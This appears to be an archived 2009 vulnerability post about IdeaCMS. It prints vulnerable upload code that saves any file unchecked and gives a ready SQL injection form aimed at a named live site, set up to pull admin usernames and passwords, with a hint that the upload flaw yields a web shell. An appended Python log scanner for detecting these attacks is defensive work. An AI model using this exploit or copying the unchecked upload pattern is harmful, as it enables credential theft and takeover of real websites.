IdeaCMS 0day +Exp2009-vulnerability warning-the black bar safety net

2009-09-26T00:00:00
ID MYHACK58:62200924792
Type myhack58
Reporter Anonymous
Modified 2009-09-26T00:00:00

Description

From: www.link0day.cn

The upload vulnerability is of little value by itself, but it helps with getting a shell from the admin backend.

upinc.asp:

<!--#include file="chkuser.asp"-->
<%Server.ScriptTimeOut=5000%>
<style type="text/css">
*{ padding:0px; margin:0px; font-size:12px}
a{ color:#666666;}
a:hover{ color:#000000}
</style>
<!--#include FILE="upload_5xsoft.inc"-->
<%
f="Uploadpic/" ' picture storage folder path
n=request.QueryString("n")
x=request.QueryString("x")
m=request("m")
if m="ok" then
  set upload=new upload_5xsoft
  set file=upload.file("file1")
  formPath=f
  if file.fileSize>0 then
    ' the client-supplied file name is used as-is: no extension or type check
    file.saveAs Server.mappath(formPath&file.FileName)
%>
<script>
<%if x=1 then%>
parent.document.all.<%=n%>.value=parent.document.all.<%=n%>.value+"! ";
<%else%>
parent.document.all.<%=n%>.value="admin/<%=f%><%=File.FileName%>";
<%end if%>
</script>
<input value="admin/<%=f%><%=File.FileName%>" name="text" type="hidden">
<a href="#">[copy the address]</a>
<a href="upinc.asp?n=<%=n%>&x=<%=x%>">[re-upload]</a>
<%
  end if
  set file=nothing
  set upload=nothing
else
%>
<form name="form1" method="post" action="upinc.asp?m=ok&n=<%=n%>&x=<%=x%>" enctype="multipart/form-data" style="margin:0px; margin:0px;">
<input type="file" name="file1" style="width:200" class="tx1" value=""><input name="" type="submit" value="upload" />
</form>
<%end if%>

The included file only uses session authentication, checking whether the session is empty. Very low-value~

This upload can upload any file.

Next is an injection vulnerability. The exp is given directly, without analysis; anyone interested can download a copy and analyze it:

<H1>IdeaCMS 's EXP --code by Link</H1><br><br>
<form action="http://www.taikoosoft.com/NewsShow.asp?id=30+union select 1,2,3,4,5,6,7,8,9,10 from admin where" method=post name=myform enctype="multipart/form-data">
<input type=submit value=Fuck>
</form>

/* The table has three fields: admin_user, admin_pwd, ID. Adjust the statement yourself.

Very simple, so no analysis.
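
Both issues described above leave traces in the web server's access log. The following is an added example, not part of the original post, that scans IIS W3C-style log lines for a non-numeric id on NewsShow.asp, a save through upinc.asp, and a non-image file requested from the Uploadpic folder. The log lines are constructed, and the field layout and the /admin/ location of upinc.asp are assumptions.

```python
import posixpath
from urllib.parse import parse_qs

# Constructed IIS W3C-style sample (not from the original post); IPs are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2009-09-26 10:00:01 GET /NewsShow.asp id=30 192.0.2.10 200
2009-09-26 10:02:11 POST /NewsShow.asp id=30+union+select+1,2,3,4,5,6,7,8,9,10+from+admin 198.51.100.7 200
2009-09-26 10:05:40 POST /admin/upinc.asp m=ok&n=pic&x=0 198.51.100.7 200
2009-09-26 10:05:52 GET /admin/Uploadpic/logo.jpg - 192.0.2.10 200
2009-09-26 10:06:03 GET /admin/Uploadpic/x.asp - 198.51.100.7 200
"""

# Uploadpic is a picture folder, so anything else served from it is suspect.
IMAGE_EXT = {".jpg", ".jpeg", ".gif", ".png", ".bmp"}

def classify(record):
    """Return the alert names raised by one parsed log record."""
    stem = record["cs-uri-stem"].lower()
    query = record["cs-uri-query"]
    alerts = []
    if stem.endswith("/newsshow.asp"):
        # parse_qs decodes '+' and %xx, so encoded SQL keywords still fail isdigit().
        ids = parse_qs(query, keep_blank_values=True).get("id", [])
        if any(not value.isdigit() for value in ids):
            alerts.append("non-numeric id on NewsShow.asp")
    if stem.endswith("/upinc.asp") and record["cs-method"] == "POST":
        # m=ok is the branch of upinc.asp that calls file.saveAs.
        if "ok" in parse_qs(query).get("m", []):
            alerts.append("file saved through upinc.asp")
    if "/uploadpic/" in stem:
        if posixpath.splitext(stem)[1] not in IMAGE_EXT:
            alerts.append("non-image file requested from Uploadpic")
    return alerts

def scan(log_text):
    """Parse W3C log text using its #Fields header; return (ip, stem, alert) tuples."""
    names, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            names = line.split()[1:]
        elif line and not line.startswith("#"):
            record = dict(zip(names, line.split()))
            hits.extend((record["c-ip"], record["cs-uri-stem"], a) for a in classify(record))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep="  ")
```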